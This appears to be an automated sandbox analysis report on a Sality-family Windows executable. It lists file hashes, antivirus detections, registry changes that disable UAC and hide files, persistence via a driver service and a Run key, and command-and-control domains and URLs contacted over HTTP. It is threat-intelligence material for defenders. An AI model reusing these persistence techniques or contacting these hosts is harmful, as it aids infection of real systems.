Analysis Date | 2014-04-30 00:33:43 |
---|---|
MD5 | c0604710fc2a026149a2f42b8ec8334e |
SHA1 | ff6428dfc70af8db22a9e220f980e1102c88d155 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: d681da53549fbe2dc3ac40c634d128ce sha1: 752dc62aad6710809884637abe0f85b1c88c5dc7 size: 173056 | |
Section | .rdata md5: e977908417aacae1d04d6617ed2fe13e sha1: 8e9d5635c1a95acfc31dac7a17fa3d3691e0ac41 size: 52736 | |
Section | .data md5: 65f01e884d3b6e859b26769f9e7c7590 sha1: f14e8216aeea33746fec0ecbe3323a0440fddb72 size: 25600 | |
Section | .reloc md5: c3e61e99dd0ff2dbb46c5ad805b89057 sha1: 10e737f326c5d0a595b0d406730c1bf50e98616b size: 3072 | |
Section | .rrdata md5: b8f51fb12624162ebe296804d5d4d12c sha1: 46c0ca587bbd681c9f981afe8c80f68fcc3e84fb size: 81920 | |
Timestamp | 2013-03-31 15:14:51 | |
Pdb path | @ | |
PEhash | 243d2ef0a15a6c94ead7205bf7a0e60a9e2542cc | |
IMPhash | 09ace0653e9a1681c71aa59f915845b3 | |
AV | F-Secure Anti-Virus 2013 | Win32.Sality.OG |
AV | AVG AntiVirus | Win32/Tanatos.M |
AV | Emsisoft Command Line Scanner | Win32.Sality.OG |
AV | Ad-Aware Command-Line | Win32.Sality.OG |
AV | 360 Safe | Win32.Sality.OG |
AV | Avira Anti-Virus Command Line Scanner | W32/Sality.Y |
AV | Microsoft Security Essentials 32bit | Virus:Win32/Sality.AM |
AV | Quick Heal AntiVirus | W32.Sality.R |
AV | Trend Micro System Cleaner (SysClean) | PE_SALITY.EN |
AV | Ikarus Command-Line Scanner | Trojan-Spy.Win32.Agent.EO |
AV | F-PROT Antivirus for Windows | W32/Sality.AK |
AV | ArcaVir 2013 Antivirus | W32.Sality.Aa |
AV | Rising Command-Line Scanner | Win32.KUKU.ky |
AV | eScan Anti-Virus | Win32.Sality.OG |
AV | McAfee Command-Line Scanner | W32/Sality.gen.z |
AV | Sunbelt Vipre Antivirus version 3.0 | Trojan.Win32.Gamarue.lvlv (v) |
AV | ESET NOD32 Antivirus | Win32/Sality.NAR virus |
AV | CA (Total Defense) Internet Security Suite | Win32/Sality.AA |
AV | VirusBlokAda (Console scanner) | Virus.Win32.Sality.kaka |
AV | Symantec Command-Line Scanner | W32.Sality.AE |
AV | Fortinet Command-Line Scanner | W32/Sality.AA |
AV | Avast! Professional Anti-Virus 8.0 | No Virus |
AV | Norman AntiVirus | win32/Sality.BBYL |
AV | Sophos Command-Line Scanner | W32/Sality-AM |
AV | Dr. Web Anti-Virus for Windows | Win32.Sector.5 |
AV | Kaspersky Anti-Virus | Virus.Win32.Sality.gen |
AV | Command Anti-Malware | W32/Sality.AK |
AV | MalwareBytes Anti-Malware PRO | No Virus |
AV | ClamWin Antivirus (Clam AV Engine) | W32.Sality-56 |
Runtime Details:
Process
↳ C:\malware.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Registry | HKEY_CURRENT_USER\Software\Administrator914\-993627007\1768776769 ➝ 26 |
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\malware.exe ➝ C:\malware.exe:*:Enabled:ipsec |
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Administrator914\A1_0 ➝ 3432392762 |
Registry | HKEY_CURRENT_USER\SOFTWARE\ImageBase ➝ NULL |
Creates File | C:\autorun.inf |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe |
Creates File | C:\TEMP\FILES\monitor.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp |
Creates File | C:\11ab7 |
Creates File | C:\WINDOWS\SYSTEM.INI |
Creates File | C:\uoleqe.pif |
Creates File | PIPE\SfcApi |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | PIPE\wkssvc |
Creates File | C:\TEMP\FILES\AcroRd32.exe |
Creates File | C:\122c5 |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp |
Deletes File | C:\122c5 |
Deletes File | C:\11ab7 |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe" |
Creates Mutex | services.exeM_616_ |
Creates Mutex | smss.exeM_492_ |
Creates Mutex | svchost.exeM_848_ |
Creates Mutex | svchost.exeM_804_ |
Creates Mutex | lsass.exeM_628_ |
Creates Mutex | Op1mutx9 |
Creates Mutex | userinit.exeM_236_ |
Creates Mutex | monitor.exeM_1128_ |
Creates Mutex | svchost.exeM_1016_ |
Creates Mutex | explorer.exeM_324_ |
Creates Mutex | csrss.exeM_548_ |
Creates Mutex | alg.exeM_1868_ |
Creates Mutex | malware.exeM_1280_ |
Creates Mutex | winlogon.exeM_572_ |
Creates Mutex | svchost.exeM_1108_ |
Creates Mutex | reader_sl.exeM_960_ |
Creates Mutex | spoolsv.exeM_1336_ |
Creates Mutex | svchost.exeM_1136_ |
Creates Mutex | svchost.exeM_1204_ |
Process
↳ C:\WINDOWS\system32\userinit.exe
Creates Mutex | userinit.exeM_236_ |
---|---|
Creates Mutex | Op1mutx9 |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\Explorer.EXE ➝ C:\WINDOWS\Explorer.EXE:*:Enabled:ipsec |
---|---|
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2 |
Creates File | C:\TEMP\FILES\monitor.exe |
Creates File | C:\xahynx.cmd |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe |
Creates File | C:\TEMP\FILES\NOTEPAD.EXE |
Creates File | C:\TEMP\FILES\wuauclt.exe |
Creates File | C:\17ccc |
Creates File | C:\WINDOWS\system32\drivers\sfkji.sys |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\TEMP\FILES\xmefe.exe |
Creates File | C:\170b6 |
Creates File | C:\174bd |
Creates File | C:\TEMP\FILES\msfrnr.exe |
Creates File | C:\autorun.inf |
Creates File | PIPE\srvsvc |
Creates File | C:\TEMP\FILES\reader_sl.exe |
Creates File | C:\wnbw.pif |
Creates File | asc3360pr |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | PIPE\SfcApi |
Creates File | C:\TEMP\FILES\AcroRd32.exe |
Creates File | C:\TEMP\FILES\msiexec.exe |
Deletes File | C:\174bd |
Deletes File | C:\170b6 |
Deletes File | C:\autorun.inf |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe |
Deletes File | C:\17ccc |
Deletes File | C:\WINDOWS\system32\drivers\sfkji.sys |
Creates Mutex | services.exeM_616_ |
Creates Mutex | smss.exeM_492_ |
Creates Mutex | svchost.exeM_848_ |
Creates Mutex | svchost.exeM_804_ |
Creates Mutex | lsass.exeM_628_ |
Creates Mutex | Op1mutx9 |
Creates Mutex | monitor.exeM_1128_ |
Creates Mutex | Shell.CMruPidlList |
Creates Mutex | wuauclt.exeM_1428_ |
Creates Mutex | explorer.exeM_324_ |
Creates Mutex | svchost.exeM_1016_ |
Creates Mutex | msiexec.exeM_1596_ |
Creates Mutex | csrss.exeM_548_ |
Creates Mutex | alg.exeM_1868_ |
Creates Mutex | winlogon.exeM_572_ |
Creates Mutex | svchost.exeM_1108_ |
Creates Mutex | reader_sl.exeM_960_ |
Creates Mutex | spoolsv.exeM_1336_ |
Creates Mutex | svchost.exeM_1204_ |
Creates Mutex | svchost.exeM_1136_ |
Creates Service | asc3360pr - C:\WINDOWS\system32\drivers\sfkji.sys |
Starts Service | IPFILTERDRIVER |
Starts Service | asc3360pr |
Process
↳ C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
Creates Mutex | reader_sl.exeM_960_ |
---|---|
Creates Mutex | Op1mutx9 |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"
Creates Process | C:\WINDOWS\system32\wuauclt.exe |
---|---|
Creates Mutex | msiexec.exeM_1596_ |
Creates Mutex | Op1mutx9 |
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Creates File | WMIDataDevice |
---|---|
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
---|---|
Creates File | PIPE\lsarpc |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | \Device\Afd\Endpoint |
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7 |
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00 |
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL |
Creates File | WMIDataDevice |
Process
↳ C:\WINDOWS\System32\alg.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\wuauclt.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe\\x00 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\_INSTA~1\msiexec.exe |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp |
Creates Mutex | wuauclt.exeM_1428_ |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | 3227095050 |
Creates Mutex | TLS |
Creates Mutex | Op1mutx9 |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Winsock DNS | img.suckmycocklameavindustry.in |
Winsock DNS | pe.suckmycocklameavindustry.in |
Winsock DNS | sc.suckmycocklameavindustry.in |
Network Details:
DNS | www.update.microsoft.com.nsatc.net Type: A 157.56.96.156 |
---|---|
DNS | www.update.microsoft.com.nsatc.net Type: A 207.46.114.62 |
DNS | pe.suckmycocklameavindustry.in Type: A 50.116.32.177 |
DNS | sc.suckmycocklameavindustry.in Type: A 50.116.32.177 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.231 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.252 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.253 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.254 |
DNS | img.suckmycocklameavindustry.in Type: A 50.116.32.177 |
DNS | anam0rph.su Type: A 195.22.26.253 |
DNS | anam0rph.su Type: A 195.22.26.254 |
DNS | anam0rph.su Type: A 195.22.26.231 |
DNS | anam0rph.su Type: A 195.22.26.252 |
DNS | orzdwjtvmein.in Type: A 195.22.26.253 |
DNS | orzdwjtvmein.in Type: A 195.22.26.254 |
DNS | orzdwjtvmein.in Type: A 195.22.26.231 |
DNS | orzdwjtvmein.in Type: A 195.22.26.252 |
DNS | www.update.microsoft.com Type: A |
DNS | ygiudewsqhct.in Type: A |
DNS | bdcrqgonzmwuehky.nl Type: A |
HTTP GET | http://pe.suckmycocklameavindustry.in/jxsgcplzuiernbxkgtpdzmivrfboeldd User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://sc.suckmycocklameavindustry.in/anjxsgcplzuiernbxkgtpdzmivrfbovv User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP POST | http://xdqzpbcgrvkj.ru/in.php User-Agent: Mozilla/4.0 |
HTTP GET | http://img.suckmycocklameavindustry.in/thdqmavjfsocylhuqeanjxsgcplzuipp User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP POST | http://anam0rph.su/in.php User-Agent: Mozilla/4.0 |
HTTP POST | http://orzdwjtvmein.in/in.php User-Agent: Mozilla/4.0 |
Flows TCP | 192.168.1.1:1033 ➝ 157.56.96.156:80 |
Flows UDP | 192.168.1.1:1034 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1036 ➝ 50.116.32.177:80 |
Flows TCP | 192.168.1.1:1038 ➝ 50.116.32.177:80 |
Flows TCP | 192.168.1.1:1039 ➝ 195.22.26.231:80 |
Flows TCP | 192.168.1.1:1041 ➝ 50.116.32.177:80 |
Flows UDP | 192.168.1.1:1040 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1042 ➝ 195.22.26.253:80 |
Flows UDP | 192.168.1.1:1043 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1044 ➝ 195.22.26.253:80 |
Flows UDP | 192.168.1.1:1045 ➝ 8.8.4.4:53 |
Flows UDP | 192.168.1.1:1046 ➝ 8.8.4.4:53 |
Raw Pcap
Strings